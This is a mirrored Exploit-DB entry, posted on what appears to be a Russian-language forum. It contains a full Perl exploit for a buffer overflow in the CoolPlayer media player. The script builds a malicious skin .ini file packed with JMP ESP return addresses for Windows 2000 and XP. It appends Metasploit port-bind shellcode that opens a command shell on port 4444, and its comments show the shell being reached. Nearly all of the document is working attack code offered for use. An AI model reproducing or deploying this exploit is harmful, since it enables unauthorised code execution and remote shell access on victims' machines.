- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7692
- Проверка EDB
-
- Пройдено
- Автор
- JEREMY BROWN
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2009-01-07
Код:
#!/usr/bin/perl
# coolplayer_bof.pl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
#
# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit
# http://coolplayer.sourceforge.net
#
# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
#
# C:\Documents and Settings\Administrator> telnet localhost 4444
# .....
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# Some fun, good 'ole win32 smashing.. bada-bing bada-boom!
$header = "[CoolPlayer Skin]\nPlaylistSkin=";
$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP
$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP
# Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444)
$shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" .
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" .
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" .
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" .
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" .
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" .
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" .
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" .
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" .
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" .
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" .
"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" .
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" .
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" .
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" .
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" .
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" .
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" .
"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" .
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" .
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" .
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" .
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" .
"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" .
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" .
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" .
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" .
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" .
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" .
"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" .
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" .
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" .
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" .
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" .
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" .
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" .
"\x4f\x4f\x42\x4d\x5a";
$filename = $ARGV[0];
$target = $ARGV[1];
if(!defined($filename) || !defined($target))
{
print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]\n";
}
if($target == "1") { $retaddr = pack('l', $win2ksp4); }
if($target == "2") { $retaddr = pack('l', $winxpsp3); }
$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508
open(FILE, '>' . $filename);
print FILE $payload;
close(FILE);
exit;
# milw0rm.com [2009-01-07]
- Источник
- www.exploit-db.com